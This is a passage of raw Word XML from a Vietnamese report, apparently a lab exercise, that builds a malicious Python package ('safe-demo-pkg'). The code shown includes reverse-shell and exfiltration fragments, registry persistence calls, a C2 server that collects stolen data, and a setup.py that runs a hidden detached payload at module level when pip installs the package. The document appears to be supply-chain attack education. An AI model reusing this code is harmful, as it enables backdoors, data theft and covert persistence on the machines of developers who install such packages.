    <w:p w14:paraId="01AAE8F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14B86CE7"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output = proc.stdout.read() + proc.stderr.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236A89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s.send(output if output else b"Command executed.\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EEB56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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2C0C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time.sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319AB39B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E90EAD" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>def run_marker():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4B803"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persist_registry()          # T1547.001 – Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32740CE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threading.Thread(target=true_exfiltrate, daemon=False).start()  # T1041</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29204995"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threading.Thread(target=reverse_shell, daemon=False).start()    # T1059</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3AFC8" w14:textId="2CB02100" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7BEEDA0F" wp14:editId="6F4148A4">
            <wp:extent cx="5960110" cy="605790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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60110" cy="605790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B7B43" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script C2 server (c2_server.py) chạy trên Ubuntu để hứng data exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24649534" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>from http.server import BaseHTTPRequestHandler, HTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BCB9E4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>import urllib.parse, time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00343D0B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1680F9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>seen_data = set()  # Chống in trùng lặp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5EB037" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449B1B73" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class C2Handler(BaseHTTPRequestHandler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78F315"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def do_POST(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74121A1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global seen_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758087D3"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length = int(self.headers['Content-Length'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE799F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raw = self.rfile.read(length).decode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AA3B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raw not in seen_data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137C7E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seen_data.add(raw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FBA3E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parsed = urllib.parse.parse_qs(raw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCCD36"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print(f'\n[+] Data exfiltrated at {time.ctime()}:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E94BB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'data' in parsed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B5133"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print(parsed['data'][0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036EC9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self.send_response(200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E44C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self.end_headers()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62405DEE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A605611" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTPServer(('0.0.0.0', 8080), C2Handler).serve_forever()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2A584" w14:textId="49E69ACD" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="003D630A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ECD8DAE" wp14:editId="4A303AA3">
            <wp:extent cx="5960110" cy="3888105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="104138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8271" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="3888105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78247C89" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc227470568"/>
      <w:r>
        <w:t>A.4 — Liên kết package với module thực thi (__init__.py)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4B08BE87" w14:textId="28B112D0" w:rsidR="00031A18" w:rsidRDefault="00031A18">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r w:rsidRPr="00031A18">
        <w:t>File __init__.py import hàm run_marker từ module marker. Đây là bước nối giữa khung package và logic hành vi — bảo đảm khi bất kỳ code nào import package này, run_marker() có thể được gọi một cách tự nhiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AFD3CF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5D8536" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># safe_demo_pkg/__init__.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC60B9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>from .marker import run_marker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7A001" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B21782" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc227470569"/>
      <w:r>
        <w:t>A.5 — Cơ chế kích hoạt payload (setup.py) — Module-level Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="083CCB91" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là phần cốt lõi nhất của PoC và cũng là điểm được làm rõ so với phiên bản đầu. Cơ chế trigger được giải thích lại chính xác sau khi kiểm tra thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A3E63"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67EBA3FF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64182518" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Đính chính cơ chế — cmdclass vs Module-level Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D53EE5A" w14:textId="73BBB193" w:rsidR="004D4D10" w:rsidRDefault="00031A18">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00031A18">
              <w:t>Mặc dù pip hiện đại sử dụng PEP 517 build isolation, nhưng trong quá trình setuptools (build backend) fallback để phân tích metadata hoặc chuẩn bị môi trường, các đoạn code nằm ở module-level của setup.py vẫn có thể bị kích hoạt. Đây là một lỗ hổng logic phổ biến trong quá trình packaging dependency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55FF5B68" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40628297" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Luồng hoạt động thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38C495" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip tải .tar.gz về thư mục tạm AppData\Local\Temp\pip-req-build-XXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA46EC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>pip giải nén và import setup.py để đọc metadata (name, version, packages...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF8775" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Trong quá trình import, Python thực thi toàn bộ code ở cấp module — bao gồm lệnh growl()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C3E11" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>growl() spawn tiến trình Python thứ hai với flag DETACHED_PROCESS | CREATE_NO_WINDOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5E33D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Tiến trình mới chạy run_marker(): persist_registry() → true_exfiltrate() → reverse_shell()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB7A3E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Pip không hay biết gì, tiếp tục cài đặt và hoàn tất bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087D899F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53155E38" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>from setuptools import setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC72CA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>import subprocess, sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5CB787" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F99187" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>def growl():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50DFEE"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB78EB"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python_exe = sys.executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354A7F7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subprocess.Popen(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609365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[python_exe, "-c",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75E12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"from safe_demo_pkg.marker import run_marker; run_marker()"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C38B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creationflags=0x00000008 | 0x08000000,  # DETACHED + NO_WINDOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228954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close_fds=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2B11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start_new_session=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E81587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332C7AAB"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except: pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6AC1FF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A11F3E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># ── MODULE-LEVEL TRIGGER ──────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E384B90" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Pip import file này để đọc metadata → growl() chạy ngay lập tức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B7BC70" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Không cần cmdclass, không cần PEP 517 hook, không cần user làm gì thêm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4E876" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>growl()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416AD32" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FEFEB9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setup(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EFBC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name='safe-demo-pkg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F371A" w14:textId="23D9EC13" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    version='1.</w:t>
      </w:r>
      <w:r w:rsidR="00031A18">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841A08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packages=['safe_demo_pkg'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B780A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description='S04 Supply Chain Demo',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D06ACD" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E2147" w14:textId="628BFC53" w:rsidR="004D4D10" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1896"/>
        </w:tabs>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2F5BDBB0" wp14:editId="6B9925DA">
            <wp:extent cx="5960110" cy="726369"/>
            <wp:effectExtent l="0" t="0" r="254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960110" cy="726369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F5C5C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc227470570"/>
      <w:r>
        <w:t>A.6 — Build package thành artifact phân phối</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="64371EC5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi hoàn tất cấu hình, nhóm đóng gói dự án thành file .tar.gz — định dạng phân phối chuẩn của Python package. Bước này chuyển project từ trạng thái mã nguồn sang trạng thái artifact sẵn sàng được phân phối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A45464" w14:textId="211C86AF" w:rsidR="004D4D10" w:rsidRDefault="00A93806">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00A93806">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E67AF94" wp14:editId="066DA869">
            <wp:extent cx="5960110" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="44784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4443" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="3105150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
